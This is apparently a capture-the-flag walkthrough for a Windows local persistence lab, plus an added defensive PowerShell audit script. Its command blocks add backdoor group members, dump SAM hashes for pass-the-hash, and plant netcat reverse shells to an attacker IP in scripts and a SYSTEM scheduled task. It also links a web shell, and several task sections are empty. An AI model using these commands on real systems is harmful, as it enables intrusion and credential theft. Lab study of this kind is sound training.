Windows Local Persistence
March 16, 2024
Task 1: Introduction

Task 2: Tampering With Unprivileged Accounts
For flag 1
```
net localgroup administrators thmuser0 /add
net localgroup "Backup Operators" thmuser1 /add
net localgroup "Remote Management Users" thmuser1 /add
evil-winrm -i 10.10.112.102 -u thmuser1 -p Password321
whoami /groups
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
evil-winrm -i 10.10.112.102 -u thmuser1 -p Password321
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak
ls
python3 ~/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL
ruby evil-winrm.rb -i 10.10.112.102 -u Administrator -H f3118544a831e728781d780cfdb9c1fa
```

For flag 2
```
secedit /export /cfg config.inf
notepad config.inf
secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.inf
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI
net user thmuser2
ruby evil-winrm.rb -i 10.10.112.102 -u thmuser2 -p Password321
```

For flag 3
```
wmic useraccount get name,sid
cd /tools/pstools
dir
PsExec64.exe -i -s regedit
```

```
.\flag3.exe
whoami
```
Task 3: Backdooring Files

For the first flag of this task
```
cd /Windows/System32
notepad backdoor.ps1
```
Contents of backdoor.ps1:
```
Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe 10.9.193.229 4445"
C:\Windows\System32\calc.exe
```


For the second flag of this task

```
Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe ATTACKER_IP 4448"
C:\Windows\system32\NOTEPAD.EXE $args[0]
```


Task 4: Abusing Services
For the first flag for this task



For the second flag of this task




Task 5: Abusing Scheduled Tasks
```
schtasks /create /sc minute /mo 1 /tn THM-TaskBackdoor /tr "c:\tools\nc64 -e cmd.exe 10.9.193.229 4449" /ru SYSTEM
schtasks /query /tn thm-taskbackdoor
cd /tools/pstools
./PsExec64.exe -s -i regedit
```

```
schtasks /query /tn thm-taskbackdoor
```
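A defender-side check for the artifacts Task 2 and Task 5 leave behind, added here as an example (not the room's code or this walkthrough's): it lists members of the three abused local groups, reports LocalAccountTokenFilterPolicy=1, and finds scheduled tasks that exist in the registry but are hidden from the scheduler. The function name Get-PersistenceFindings is my own, and the last check assumes the regedit-as-SYSTEM step removed the task's SD value under TaskCache\Tree, which is what makes the task vanish from schtasks /query.

```powershell
# Added defensive audit for the artifacts this walkthrough creates (Tasks 2 and 5).
# Not the room's code; run from an elevated PowerShell 5.1+ session on the target.
function Get-PersistenceFindings {
    $findings = New-Object System.Collections.Generic.List[object]
    $add = { param($check, $value)
        $findings.Add([pscustomobject]@{ Check = $check; Value = $value }) }

    # 1. Who sits in the local groups the room abuses for backdoor access
    foreach ($group in 'Administrators', 'Backup Operators', 'Remote Management Users') {
        Get-LocalGroupMember -Group $group -ErrorAction SilentlyContinue |
            ForEach-Object { & $add "Member of '$group'" $_.Name }
    }

    # 2. LocalAccountTokenFilterPolicy=1 gives local admins a full token over the
    #    network, which is what let the remote reg save / SAM dump succeed
    $sysPol = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $policy = (Get-ItemProperty -Path $sysPol -ErrorAction SilentlyContinue).LocalAccountTokenFilterPolicy
    if ($policy -eq 1) { & $add 'LocalAccountTokenFilterPolicy' 'set to 1 (remote UAC filtering off)' }

    # 3. Tasks hidden by deleting the SD value under TaskCache\Tree (assumed to be
    #    the regedit step above): walk the registry and compare with the scheduler
    $tree = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree'
    $treeName = (Get-Item -Path $tree).Name     # HKEY_LOCAL_MACHINE\... form of the key
    $visible = @(Get-ScheduledTask -ErrorAction SilentlyContinue |
                 ForEach-Object { $_.TaskPath + $_.TaskName })
    Get-ChildItem -Path $tree -Recurse | ForEach-Object {
        $props = Get-ItemProperty -Path $_.PSPath
        if (-not $props.PSObject.Properties['Id']) { return }    # folder key, not a task
        $taskPath = $_.Name.Substring($treeName.Length)           # e.g. \THM-TaskBackdoor
        if (-not $props.PSObject.Properties['SD']) { & $add 'Task with SD value removed' $taskPath }
        elseif ($visible -notcontains $taskPath)   { & $add 'Task in registry, not listed' $taskPath }
    }
    return $findings
}

Get-PersistenceFindings | Format-Table -AutoSize
```

Group membership is also worth diffing against a known-good baseline, since the "Backup Operators" and "Remote Management Users" additions look legitimate on their own.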

Task 6: Local Triggered Persistence
For the first flag of this task





For the second flag of this task



PS: Change the name from MyBackdooooooor to MyBackdoor, since the task expects that exact name.


For the third flag of this task





For the fourth flag of this task




Task 7: Backdooring the Login Screen / RDP



For the second flag of this task


Just click the Ease of Access button on the login screen.

Task 8: Persisting Through Existing Services
Download the web shell (cmdasp.aspx) here:
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx






For the second flag of this task





